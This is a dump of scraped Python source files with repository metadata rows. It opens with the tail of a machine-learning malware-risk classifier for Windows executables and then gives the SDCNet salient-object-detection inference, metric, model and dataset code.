self.x_list = [x['Baseofcode'], x['baseaddr'], x['characteristics'], x['dllchar'], self.mean_entropy,
x['filealign'], x['imagebase'], list(importedDLL), list(importedSymbols), x['Machine'][0],
x['Magic'], x['rva'], x['Number of Sections'], x['Number of symbols'], self.mean_petype,
self.mean_pointer, self.mean_size, x['CodeSize'], x['headersize'], x['imagesize'],
x['SizeofInitial'], self.mean_optionalHeader, x['UninitSize'], self.mean_timestamp]
y = ""
z = ""
m = np.array(self.x_list)
imported_dlls = m[7]
imported_syms = m[8]
m = np.delete(m, 7)
m = np.delete(m, 7)
m = np.reshape(m, (1, m.shape[0]))
print("m:", m)
x_test = m
n_x_test = np.zeros(shape=(x_test.shape[0], 132))
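        # 132 features per sample: 20 DLLs x (two scraped DLL attributes + tf-idf) = 60, followed by the 22 numeric PE features and the top-50 symbol tf-idf scores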
for i in range(0, x_test.shape[0]):
if i % 1000 == 0:
print(i)
            # (the training dataframe is not consulted here; all DLL/symbol strings come from the parsed binary)
row_dlls = imported_dlls
row_syms = imported_syms
row_dlss_str=""
row_syms_str=""
for ele in row_dlls:
row_dlss_str += ele.lower() +" "
for ele in row_syms:
row_syms_str += ele.lower() +" "
print(row_dlss_str)
print(row_syms_str)
dll_tfidfs = dll_vec.transform([row_dlss_str, ]).toarray()[0]
dll_tfidf_pairs = []
for num, dll in enumerate(row_dlss_str.split()):
if num == 20:
break
dll_tfidf = dll_tfidfs[list(dll_vec.get_feature_names()).index(dll)]
dll_tfidf_pairs.append([dll_tfidf, list(dll_vec.get_feature_names()).index(dll)])
dll_tfidf_pairs = np.array(dll_tfidf_pairs)
# print(dll_tfidf_pairs)
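            # sort DLLs by descending tf-idf so the most distinctive imports fill the first feature slots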
dll_tfidf_pairs = dll_tfidf_pairs[dll_tfidf_pairs[:, 0].argsort()[::-1]]
for j, pair in enumerate(dll_tfidf_pairs):
name = dll_vec.get_feature_names()[int(pair[1])]
if name in scrape_dict:
n_x_test[i, 3 * j] = scrape_dict[name][0]
n_x_test[i, 3 * j + 1] = scrape_dict[name][1]
n_x_test[i, 3 * j + 2] = pair[0]
else:
n_x_test[i, 3 * j] = 1
n_x_test[i, 3 * j + 1] = 4
n_x_test[i, 3 * j + 2] = pair[0]
# print(ip1_train)
sym_tfidf = sym_vec.transform([row_syms_str, ]).toarray()[0]
sym_tfidf = sorted(sym_tfidf, reverse=True)[:50]
ip2_train = np.append(x_test[i], sym_tfidf)
n_x_test[i, 60:] = ip2_train
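        # standardize with the stored mean/variance (a small constant is added to the standard deviation for numerical stability) before predicting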
num = model.predict((n_x_test - self.mean) / (self.var ** 0.5 + 0.069))
print("NUM" + str(num))
if num >= 0 and num <= 0.3:
y = "Low"
z = "Good to use"
elif num > 0.3 and num <= 0.6:
y = "Medium"
z = "Can be used"
elif num > 0.6 and num <= 1:
y = "High"
z = "Avoid Using"
else:
y = "Out of range"
z = "Cant determine"
self.label.config(text="Recommendation : " + y)
self.label = ttk.Label(self.labelFrame, text="")
self.label.grid(column=1, row=3)
self.label.config(text=z)
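# module-level setup: load the training data, rebuild the tf-idf vectorizers and the scraped DLL popularity table used by fileDialog above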
df = pd.read_csv("brazilian-malware.csv")
df = df.drop(columns=["Identify", "SHA1", "FirstSeenDate"])
idll = df.loc[:, "ImportedDlls"]
idll = set(idll)
dlls = set()
for row in idll:
for dll in row.split():
dlls.add(dll)
isyms = df.loc[:, "ImportedSymbols"]
isyms = set(isyms)
syms = set()
for row in isyms:
for dll in row.split():
syms.add(dll)
df_temp = df.drop(columns=["ImportedDlls", "ImportedSymbols"])
x_train = np.array(df_temp.drop(columns=["Label"]).iloc[:40001, :])
y_train = np.array(df_temp.iloc[:40001, :].loc[:, "Label"])
x_test = np.array(df_temp.drop(columns=["Label"]).iloc[40001:, :])
y_test = np.array(df_temp.iloc[40001:, :].loc[:, "Label"])
from sklearn.feature_extraction.text import TfidfVectorizer
dll_vec = TfidfVectorizer(smooth_idf=False, analyzer="word", tokenizer=lambda x: x.split())
x = dll_vec.fit_transform(list(df.loc[:, "ImportedDlls"]))
sym_vec = TfidfVectorizer(smooth_idf=False, analyzer="word", tokenizer=lambda x: x.split())
x = sym_vec.fit_transform(list(df.loc[:, "ImportedSymbols"]))
df_scrape = pd.read_csv("spithack1.csv").drop(['Description'], axis=1)
np_scrape = df_scrape.values
scrape_dict = {}
for i, row in enumerate(np_scrape):
if not row[1] == "-1":
name = row[0].replace("_dll", ".dll")
pop = -1
if "Very Low" in row[1]:
pop = 1
if "Low" in row[1]:
pop = 2
if "Medium" in row[1]:
pop = 3
if "High" in row[1]:
pop = 4
if "Very High" in row[1]:
pop = 5
if pop == -1:
print("err", row[1])
exp = row[2].replace(",", "")
scrape_dict[name] = [pop, int(exp)]
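# load the pre-trained classifier from its HDF5 checkpoint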
model = load_model('acc_97_44.h5')
|
Python
| 386
| 35.992229
| 107
|
/python/test_python3_cli.py~
| 0.655182
| 0.439846
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import torch
import torch.nn.functional as F
from PIL import Image
from torch.autograd import Variable
from torchvision import transforms
from torch.utils.data import DataLoader
import matplotlib.pyplot as plt
import pandas as pd
from tqdm import tqdm
from misc import check_mkdir, AvgMeter, cal_precision_recall_mae, cal_fmeasure, cal_sizec, cal_sc
from datasets import TestFolder_joint
import joint_transforms
from model import R3Net, SDCNet
torch.manual_seed(2021)
# set which gpu to use
torch.cuda.set_device(6)
# the following two args specify the location of the file of trained model (pth extension)
# you should have the pth file in the folder './$ckpt_path$/$exp_name$'
ckpt_path = './ckpt'
exp_name = 'SDCNet'
msra10k_path = './SOD_label/label_msra10k.csv'
ecssd_path = './SOD_label/label_ECSSD.csv'
dutomrom_path = './SOD_label/label_DUT-OMROM.csv'
dutste_path = './SOD_label/label_DUTS-TE.csv'
hkuis_path = './SOD_label/label_HKU-IS.csv'
pascals_path = './SOD_label/label_PASCAL-S.csv'
sed2_path = './SOD_label/label_SED2.csv'
socval_path = './SOD_label/label_SOC-Val.csv'
sod_path = './SOD_label/label_SOD.csv'
thur15k_path = './SOD_label/label_THUR-15K.csv'
args = {
'snapshot': '30000', # your snapshot filename (exclude extension name)
'save_results': True, # whether to save the resulting masks
'test_mode': 1
}
joint_transform = joint_transforms.Compose([
#joint_transforms.RandomCrop(300),
#joint_transforms.RandomHorizontallyFlip(),
#joint_transforms.RandomRotate(10)
])
img_transform = transforms.Compose([
transforms.Resize((300, 300)),
transforms.ToTensor(),
transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])
])
target_transform = transforms.ToTensor()
to_pil = transforms.ToPILImage()
to_test ={'ECSSD': ecssd_path,'SOD': sod_path, 'DUTS-TE': dutste_path} #{'DUTS-TE': dutste_path,'ECSSD': ecssd_path,'SOD': sod_path, 'SED2': sed2_path, 'PASCAL-S': pascals_path, 'HKU-IS': hkuis_path, 'DUT-OMROM': dutomrom_path}
def main():
net = SDCNet(num_classes = 5).cuda()
print('load snapshot \'%s\' for testing, mode:\'%s\'' % (args['snapshot'], args['test_mode']))
print(exp_name)
net.load_state_dict(torch.load(os.path.join(ckpt_path, exp_name, args['snapshot'] + '.pth')))
net.eval()
results = {}
with torch.no_grad():
for name, root in to_test.items():
print('load snapshot \'%s\' for testing %s' %(args['snapshot'], name))
test_data = pd.read_csv(root)
test_set = TestFolder_joint(test_data, joint_transform, img_transform, target_transform)
test_loader = DataLoader(test_set, batch_size=1, num_workers=0, shuffle=False)
precision0_record, recall0_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision1_record, recall1_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision2_record, recall2_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision3_record, recall3_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision4_record, recall4_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision5_record, recall5_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
precision6_record, recall6_record, = [AvgMeter() for _ in range(256)], [AvgMeter() for _ in range(256)]
mae0_record = AvgMeter()
mae1_record = AvgMeter()
mae2_record = AvgMeter()
mae3_record = AvgMeter()
mae4_record = AvgMeter()
mae5_record = AvgMeter()
mae6_record = AvgMeter()
n0, n1, n2, n3, n4, n5 = 0, 0, 0, 0, 0, 0
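            # n1-n5 count test images per label class; n0 counts all images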
if args['save_results']:
check_mkdir(os.path.join(ckpt_path, exp_name, '%s_%s' % (name, args['snapshot'])))
for i, (inputs, gt, labels, img_path) in enumerate(tqdm(test_loader)):
shape = gt.size()[2:]
img_var = Variable(inputs).cuda()
img = np.array(to_pil(img_var.data.squeeze(0).cpu()))
gt = np.array(to_pil(gt.data.squeeze(0).cpu()))
sizec = labels.numpy()
pred2021 = net(img_var, sizec)
pred2021 = F.interpolate(pred2021, size=shape, mode='bilinear', align_corners=True)
pred2021 = np.array(to_pil(pred2021.data.squeeze(0).cpu()))
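                # accumulate precision/recall/MAE separately for each label class (0-4); the *6 records below cover every image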
if labels == 0:
precision1, recall1, mae1 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision1, recall1)):
p, r = pdata
precision1_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall1_record[pidx].update(r)
mae1_record.update(mae1)
n1 += 1
elif labels == 1:
precision2, recall2, mae2 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision2, recall2)):
p, r = pdata
precision2_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall2_record[pidx].update(r)
mae2_record.update(mae2)
n2 += 1
elif labels == 2:
precision3, recall3, mae3 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision3, recall3)):
p, r = pdata
precision3_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall3_record[pidx].update(r)
mae3_record.update(mae3)
n3 += 1
elif labels == 3:
precision4, recall4, mae4 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision4, recall4)):
p, r = pdata
precision4_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall4_record[pidx].update(r)
mae4_record.update(mae4)
n4 += 1
elif labels == 4:
precision5, recall5, mae5 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision5, recall5)):
p, r = pdata
precision5_record[pidx].update(p)
#print('Presicion:', p, 'Recall:', r)
recall5_record[pidx].update(r)
mae5_record.update(mae5)
n5 += 1
precision6, recall6, mae6 = cal_precision_recall_mae(pred2021, gt)
for pidx, pdata in enumerate(zip(precision6, recall6)):
p, r = pdata
precision6_record[pidx].update(p)
recall6_record[pidx].update(r)
mae6_record.update(mae6)
img_name = os.path.split(str(img_path))[1]
img_name = os.path.splitext(img_name)[0]
n0 += 1
if args['save_results']:
Image.fromarray(pred2021).save(os.path.join(ckpt_path, exp_name, '%s_%s' % (
name, args['snapshot']), img_name + '_2021.png'))
fmeasure1 = cal_fmeasure([precord.avg for precord in precision1_record],
[rrecord.avg for rrecord in recall1_record])
fmeasure2 = cal_fmeasure([precord.avg for precord in precision2_record],
[rrecord.avg for rrecord in recall2_record])
fmeasure3 = cal_fmeasure([precord.avg for precord in precision3_record],
[rrecord.avg for rrecord in recall3_record])
fmeasure4 = cal_fmeasure([precord.avg for precord in precision4_record],
[rrecord.avg for rrecord in recall4_record])
fmeasure5 = cal_fmeasure([precord.avg for precord in precision5_record],
[rrecord.avg for rrecord in recall5_record])
fmeasure6 = cal_fmeasure([precord.avg for precord in precision6_record],
[rrecord.avg for rrecord in recall6_record])
results[name] = {'fmeasure1': fmeasure1, 'mae1': mae1_record.avg,'fmeasure2': fmeasure2,
'mae2': mae2_record.avg, 'fmeasure3': fmeasure3, 'mae3': mae3_record.avg,
'fmeasure4': fmeasure4, 'mae4': mae4_record.avg, 'fmeasure5': fmeasure5,
'mae5': mae5_record.avg, 'fmeasure6': fmeasure6, 'mae6': mae6_record.avg}
print('test results:')
print('[fmeasure1 %.3f], [mae1 %.4f], [class1 %.0f]\n'\
'[fmeasure2 %.3f], [mae2 %.4f], [class2 %.0f]\n'\
'[fmeasure3 %.3f], [mae3 %.4f], [class3 %.0f]\n'\
'[fmeasure4 %.3f], [mae4 %.4f], [class4 %.0f]\n'\
'[fmeasure5 %.3f], [mae5 %.4f], [class5 %.0f]\n'\
'[fmeasure6 %.3f], [mae6 %.4f], [all %.0f]\n'%\
(fmeasure1, mae1_record.avg, n1, fmeasure2, mae2_record.avg, n2, fmeasure3, mae3_record.avg, n3, fmeasure4, mae4_record.avg, n4, fmeasure5, mae5_record.avg, n5, fmeasure6, mae6_record.avg, n0))
def accuracy(y_pred, y_actual, topk=(1,)):
"""Computes the precision@k for the specified values of k"""
final_acc = 0
maxk = max(topk)
# for prob_threshold in np.arange(0, 1, 0.01):
PRED_COUNT = y_actual.size(0)
PRED_CORRECT_COUNT = 0
prob, pred = y_pred.topk(maxk, 1, True, True)
# prob = np.where(prob > prob_threshold, prob, 0)
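    # note: the int() comparison below assumes maxk == 1 (top-1 accuracy); int() on a multi-element tensor would raise an error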
for j in range(pred.size(0)):
if int(y_actual[j]) == int(pred[j]):
PRED_CORRECT_COUNT += 1
if PRED_COUNT == 0:
final_acc = 0
else:
final_acc = float(PRED_CORRECT_COUNT / PRED_COUNT)
return final_acc * 100, PRED_COUNT
if __name__ == '__main__':
main()
|
Python
| 226
| 45.637169
| 227
|
/infer_SDCNet.py
| 0.54592
| 0.509962
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .resnext101 import ResNeXt101
|
Python
| 1
| 34
| 34
|
/resnext/__init__.py
| 0.857143
| 0.685714
|
Sssssbo/SDCNet
|
refs/heads/master
|
import numpy as np
import os
import pylab as pl
#import pydensecrf.densecrf as dcrf
class AvgMeter(object):
def __init__(self):
self.reset()
def reset(self):
self.val = 0
self.avg = 0
self.sum = 0
self.count = 0
def update(self, val, n=1):
self.val = val
self.sum += val * n
self.count += n
self.avg = self.sum / self.count
def check_mkdir(dir_name):
if not os.path.exists(dir_name):
os.mkdir(dir_name)
def cal_precision_recall_mae(prediction, gt):
# input should be np array with data type uint8
assert prediction.dtype == np.uint8
assert gt.dtype == np.uint8
assert prediction.shape == gt.shape
eps = 1e-4
prediction = prediction / 255.
gt = gt / 255.
mae = np.mean(np.abs(prediction - gt))
hard_gt = np.zeros(prediction.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt) #t is sum of 1
precision, recall, TPR, FP = [], [], [], []
    # calculate precision and recall at 256 binarization thresholds (0/255 through 255/255)
for threshold in range(256):
threshold = threshold / 255.
hard_prediction = np.zeros(prediction.shape)
hard_prediction[prediction > threshold] = 1
#false_pred = np.zeros(prediction.shape)
#false_prediction[prediction < threshold] = 1
a = prediction.shape
tp = np.sum(hard_prediction * hard_gt)
p = np.sum(hard_prediction)
#for roc
#fp = np.sum(false_pred * hard_gt)
#tpr = (tp + eps)/(a + eps)
fp = p - tp
#TPR.append(tpr)
FP.append(fp)
precision.append((tp + eps) / (p + eps))
recall.append((tp + eps) / (t + eps))
return precision, recall, mae#, TPR, FP
def cal_fmeasure(precision, recall):
assert len(precision) == 256
assert len(recall) == 256
beta_square = 0.3
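    # F-measure with beta^2 = 0.3 (the weighting commonly used in saliency evaluation); take the maximum over all 256 thresholds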
max_fmeasure = max([(1 + beta_square) * p * r / (beta_square * p + r) for p, r in zip(precision, recall)])
return max_fmeasure
def cal_sizec(prediction, gt):
# input should be np array with data type uint8
assert prediction.dtype == np.uint8
assert gt.dtype == np.uint8
assert prediction.shape == gt.shape
eps = 1e-4
#print(gt.shape)
prediction = prediction / 255.
gt = gt / 255.
hard_gt = np.zeros(prediction.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt) #t is sum of 1
precision, recall, TPR, FP = [], [], [], []
    # calculate precision and recall at 256 binarization thresholds (0/255 through 255/255)
best_threshold = 0
best_F = 0
for threshold in range(256):
threshold = threshold / 255.
gt_size = np.ones(prediction.shape)
a = np.sum(gt_size)
hard_prediction = np.zeros(prediction.shape)
hard_prediction[prediction > threshold] = 1
tp = np.sum(hard_prediction * hard_gt)
p = np.sum(hard_prediction)
#print(a, p)
precision = (tp + eps) / (p + eps)
recall = (tp + eps) / (t + eps)
beta_square = 0.3
fmeasure = (1 + beta_square) * precision * recall / (beta_square * precision + recall)
if fmeasure > best_F:
best_threshold = threshold*255
best_F = fmeasure
sm_size = p / a
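    # map the foreground-to-image area ratio into one of five size classes (0 = smallest objects)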
if 0 <= sm_size < 0.1:
sizec = 0
elif 0.1 <= sm_size < 0.2:
sizec = 1
elif 0.2 <= sm_size < 0.3:
sizec = 2
elif 0.3 <= sm_size < 0.4:
sizec = 3
elif 0.4 <= sm_size <= 1.0:
sizec = 4
return sizec, best_threshold#, TPR, FP
def cal_sc(gt):
# input should be np array with data type uint8
assert gt.dtype == np.uint8
eps = 1e-4
gt = gt / 255.
#print(gt.shape)
img_size = np.ones(gt.shape)
a = np.sum(img_size)
hard_gt = np.zeros(gt.shape)
hard_gt[gt > 0.5] = 1
p = np.sum(hard_gt)
b = np.sum(gt)
sm_size = float(p) / float(a)
#print(p, a, sm_size, b)
#print(gt)
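    # classify the ground-truth object size by its foreground-to-image area ratio (five classes, 0 = smallest)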
if 0 <= sm_size < 0.1:
sizec = 0
elif 0.1 <= sm_size < 0.2:
sizec = 1
elif 0.2 <= sm_size < 0.3:
sizec = 2
elif 0.3 <= sm_size < 0.4:
sizec = 3
elif 0.4 <= sm_size <= 1.0:
sizec = 4
return sizec
def pr_cruve(precision, recall):
assert len(precision) == 256
assert len(recall) == 256
r = [a[1] for a in zip(precision, recall)]
p = [a[0] for a in zip(precision, recall)]
pl.title('PR curve')
pl.xlabel('Recall')
    pl.ylabel('Precision')
pl.plot(r, p)
pl.show()
# for define the size type of the salient object
def size_aware(gt):
assert gt.dtype == np.uint8
eps = 1e-4
gt = gt / 255.
hard_gt = np.zeros(gt.shape)
hard_gt[gt > 0.5] = 1
t = np.sum(hard_gt)
pic = np.size(hard_gt)
rate = t/pic
return rate
# # codes of this function are borrowed from https://github.com/Andrew-Qibin/dss_crf
# def crf_refine(img, annos):
# def _sigmoid(x):
# return 1 / (1 + np.exp(-x))
# assert img.dtype == np.uint8
# assert annos.dtype == np.uint8
# assert img.shape[:2] == annos.shape
# # img and annos should be np array with data type uint8
# EPSILON = 1e-8
# M = 2 # salient or not
# tau = 1.05
# # Setup the CRF model
# d = dcrf.DenseCRF2D(img.shape[1], img.shape[0], M)
# anno_norm = annos / 255.
# n_energy = -np.log((1.0 - anno_norm + EPSILON)) / (tau * _sigmoid(1 - anno_norm))
# p_energy = -np.log(anno_norm + EPSILON) / (tau * _sigmoid(anno_norm))
# U = np.zeros((M, img.shape[0] * img.shape[1]), dtype='float32')
# U[0, :] = n_energy.flatten()
# U[1, :] = p_energy.flatten()
# d.setUnaryEnergy(U)
# d.addPairwiseGaussian(sxy=3, compat=3)
# d.addPairwiseBilateral(sxy=60, srgb=5, rgbim=img, compat=5)
# # Do the inference
# infer = np.array(d.inference(1)).astype('float32')
# res = infer[1, :]
# res = res * 255
# res = res.reshape(img.shape[:2])
# return res.astype('uint8')
|
Python
| 227
| 25.356829
| 110
|
/misc.py
| 0.56343
| 0.531673
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .make_model import ResNet50, ResNet50_BIN, ResNet50_LowIN
|
Python
| 1
| 62
| 62
|
/resnet/__init__.py
| 0.822581
| 0.725806
|
Sssssbo/SDCNet
|
refs/heads/master
|
from .resnet import ResNet, BasicBlock, Bottleneck, IN_Bottleneck, ResNet_LowIN  # IN_Bottleneck and ResNet_LowIN are assumed to be defined in .resnet, since the classes below reference them
import torch
from torch import nn
from .config import resnet50_path
model_urls = {
'resnet18': 'https://download.pytorch.org/models/resnet18-5c106cde.pth',
'resnet34': 'https://download.pytorch.org/models/resnet34-333f7ec4.pth',
'resnet50': 'https://download.pytorch.org/models/resnet50-19c8e357.pth',
'resnet101': 'https://download.pytorch.org/models/resnet101-5d3b4d8f.pth',
'resnet152': 'https://download.pytorch.org/models/resnet152-b121ed2d.pth',
}
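# model_urls is kept for reference only; the backbones below load their weights from the local resnet50_path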
class ResNet50(nn.Module):
def __init__(self):
super(ResNet50, self).__init__()
net = ResNet(last_stride=2,
block=Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
class ResNet50_BIN(nn.Module):
def __init__(self):
super(ResNet50_BIN, self).__init__()
net = ResNet(last_stride=2,
block=IN_Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
class ResNet50_LowIN(nn.Module):
def __init__(self):
super(ResNet50_LowIN, self).__init__()
net = ResNet_LowIN(last_stride=2,
block=Bottleneck, frozen_stages=False,
layers=[3, 4, 6, 3])
net.load_param(resnet50_path)
self.layer0 = net.layer0
self.layer1 = net.layer1
self.layer2 = net.layer2
self.layer3 = net.layer3
self.layer4 = net.layer4
def forward(self, x):
layer0 = self.layer0(x)
layer1 = self.layer1(layer0)
layer2 = self.layer2(layer1)
layer3 = self.layer3(layer2)
layer4 = self.layer4(layer3)
return layer4
def load_param(self, trained_path):
param_dict = torch.load(trained_path)
for i in param_dict:
if 'classifier' in i or 'arcface' in i:
continue
self.state_dict()[i].copy_(param_dict[i])
print('Loading pretrained model from {}'.format(trained_path))
|
Python
| 104
| 32.740383
| 78
|
/resnet/make_model.py
| 0.586492
| 0.54175
|
Sssssbo/SDCNet
|
refs/heads/master
|
import os
import os.path
import torch.utils.data as data
from PIL import Image
class ImageFolder_joint(data.Dataset):
    # image and gt should be in the same folder and share the same filename except for the extension (.jpg and .png respectively)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
imgs = []
self.label_list = label_list
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __len__(self):
return len(self.label_list)
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target, label
class ImageFolder_joint_for_edge(data.Dataset):
    # image and gt should be in the same folder and share the same filename except for the extension (.jpg and .png respectively)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
imgs = []
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
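        # derive the edge-map path from the gt path, e.g. './masks/img.png' -> './masks/img_edge.png' (assumes a leading './' and a single '.' in the remainder)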
edge_path = "."+gt_path.split(".")[1]+"_edge."+gt_path.split(".")[2]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
target_edge = Image.open(edge_path).convert('L')
if self.joint_transform is not None:
if img.size != target.size or img.size != target_edge.size:
print("error path:", img_path, gt_path)
print("size:", img.size, target.size, target_edge.size)
img, target, target_edge = self.joint_transform(img, target, target_edge)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
target_edge = self.target_transform(target_edge)
return img, target, target_edge, label
def __len__(self):
return len(self.imgs)
class TestFolder_joint(data.Dataset):
    # image and gt should be in the same folder and share the same filename except for the extension (.jpg and .png respectively)
def __init__(self, label_list, joint_transform=None, transform=None, target_transform=None):
imgs = []
for index, row in label_list.iterrows():
imgs.append((row['img_path'], row['gt_path'], row['label']))
self.imgs = imgs
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path, label = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target, label, img_path
def __len__(self):
return len(self.imgs)
def make_dataset(root):
img_list = [os.path.splitext(f)[0] for f in os.listdir(root) if f.endswith('.jpg')]
return [(os.path.join(root, img_name + '.jpg'), os.path.join(root, img_name + '.png')) for img_name in img_list]
class ImageFolder(data.Dataset):
    # image and gt should be in the same folder and share the same filename except for the extension (.jpg and .png respectively)
def __init__(self, root, joint_transform=None, transform=None, target_transform=None):
self.root = root
self.imgs = make_dataset(root)
self.joint_transform = joint_transform
self.transform = transform
self.target_transform = target_transform
def __getitem__(self, index):
img_path, gt_path = self.imgs[index]
img = Image.open(img_path).convert('RGB')
target = Image.open(gt_path).convert('L')
if self.joint_transform is not None:
img, target = self.joint_transform(img, target)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.imgs)
|
Python
| 125
| 39.872002
| 118
|
/datasets.py
| 0.623214
| 0.622627
|